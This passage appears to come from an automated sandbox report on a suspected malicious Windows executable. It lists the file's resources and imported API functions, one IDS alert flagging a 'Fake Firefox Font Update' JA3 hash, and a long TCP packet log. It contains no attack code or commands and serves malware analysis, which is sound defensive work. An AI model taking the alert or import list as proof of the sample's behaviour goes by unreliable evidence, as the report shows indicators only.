RT_CURSOR | 0x78cc0 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x78df4 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x78f28 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x7905c | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x79190 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x792c4 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x793f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x795c8 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x797ac | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x7997c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x79b4c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x79d1c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x79eec | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x7a0bc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x7a28c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x7a45c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x7a62c | 0xb5198 | Device independent bitmap graphic, 816 x 303 x 24, image size 741744 | English | United States | 0.5634079462485037
RT_BITMAP | 0x12f7c4 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x12f8ac | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | | | 0.46365248226950356
RT_ICON | 0x12fd14 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m | | | 0.3290983606557377
RT_ICON | 0x13069c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.2628986866791745
RT_ICON | 0x131744 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.19533195020746888
RT_ICON | 0x133cec | 0x25e8 | Device independent bitmap graphic, 65 x 216 x 8, image size 7344, resolution 3779 x 3779 px/m, 256 important colors | | | 0.1458161582852432
RT_DIALOG | 0x1362d4 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x136328 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x13637c | 0x34 | data | | | 0.5
RT_STRING | 0x1363b0 | 0x2b0 | data | | | 0.4752906976744186
RT_STRING | 0x136660 | 0xb8 | data | | | 0.6793478260869565
RT_STRING | 0x136718 | 0xec | data | | | 0.6398305084745762
RT_STRING | 0x136804 | 0x2f0 | data | | | 0.4587765957446808
RT_STRING | 0x136af4 | 0x3d0 | data | | | 0.38729508196721313
RT_STRING | 0x136ec4 | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0x137234 | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0x137600 | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0x137814 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x1378e0 | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0x137a74 | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0x137e38 | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0x138170 | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0x138404 | 0x10 | data | | | 1.5
RT_RCDATA | 0x138414 | 0x2e8 | data | | | 0.7110215053763441
RT_RCDATA | 0x1386fc | 0x449 | Delphi compiled form 'TForm1' | | | 0.4813126709206928
RT_GROUP_CURSOR | 0x138b48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x138b5c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x138b70 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x138b84 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x138b98 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x138bac | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x138bc0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x138bd4 | 0x4c | data | | | 0.8421052631578947
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
winmm.dll | sndPlaySoundA
Language of compilation system | Country where language is spoken | Map
English | United States | (map image not included)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-26T08:12:15.955374+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 142.250.181.129 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 08:12:14.214750051 CET | 49705 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:14.214793921 CET | 443 | 49705 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:14.214895010 CET | 49705 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:14.214972019 CET | 49705 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:14.215055943 CET | 443 | 49705 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:14.215110064 CET | 49705 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:14.246114016 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:14.246165037 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:14.246318102 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:14.255412102 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:14.255426884 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:15.955230951 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:15.955374002 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:15.959990978 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:15.960017920 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:15.960346937 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:16.005717993 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:16.046184063 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:16.087368011 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.039520025 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.039530993 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.039660931 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.053195000 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.053205013 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.053301096 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.161731005 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.161883116 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.161916018 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.206764936 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.206788063 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.235270023 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.235333920 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.235351086 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.235358953 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.235416889 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.241163015 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.250581026 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.250638008 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.250644922 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.261568069 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.261627913 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.261650085 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.275361061 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.275422096 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.275430918 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.288858891 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.288914919 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.288937092 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.302572966 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.302629948 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.302650928 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.316298962 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.316385031 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.316405058 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.330066919 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.330128908 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.330152988 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.343767881 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.343846083 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.343869925 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.357369900 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.357438087 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.357459068 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.371191025 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.371273994 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.371293068 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.391176939 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.391247988 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.391273975 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.423305035 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.423362017 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.423382044 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.429846048 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.429918051 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.429930925 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.434003115 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.434050083 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.434077024 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.434083939 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.434134007 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.447721004 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.447788954 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.447837114 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.447849035 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.458623886 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.458689928 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.458695889 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.468831062 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.468893051 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.468919039 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.477814913 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.477888107 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.477914095 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.488051891 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.488111019 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.488132000 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.498074055 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.498126030 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.498146057 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.509219885 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.509290934 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.509300947 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.518260956 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.518335104 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.518341064 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.528414011 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.528485060 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.528490067 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.537856102 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.537928104 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.537935972 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.546952963 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.547051907 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.547061920 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.556463957 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.556528091 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.556534052 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.569958925 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.570087910 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.570112944 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.580008984 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.580071926 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.580079079 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.581809998 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.581857920 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.581862926 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.588927984 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.588995934 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.589001894 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.594501972 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.594577074 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.594587088 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.601317883 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.601414919 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.601421118 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.607388973 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.607455015 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.607465982 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.615288019 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.615339041 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.615344048 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.620321989 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.620403051 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.620408058 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.625355005 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.625411034 CET | 49706 | 443 | 192.168.2.8 | 142.250.181.129
Nov 26, 2024 08:12:20.625415087 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
Nov 26, 2024 08:12:20.630645037 CET | 443 | 49706 | 142.250.181.129 | 192.168.2.8
                                                                    Nov 26, 2024 08:12:20.630702972 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.630707979 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.635972977 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.636034012 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.636039972 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.640988111 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.641067028 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.641083956 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.646159887 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.646219015 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.646224022 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.651412010 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.651473999 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.651473999 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.651484966 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.651526928 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.656636953 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.661607027 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.661664009 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.661672115 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.672323942 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.672365904 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.672379971 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.672394991 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.672437906 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.673290968 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.676922083 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.676954031 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.676992893 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.677009106 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.677078009 CET49706443192.168.2.8142.250.181.129
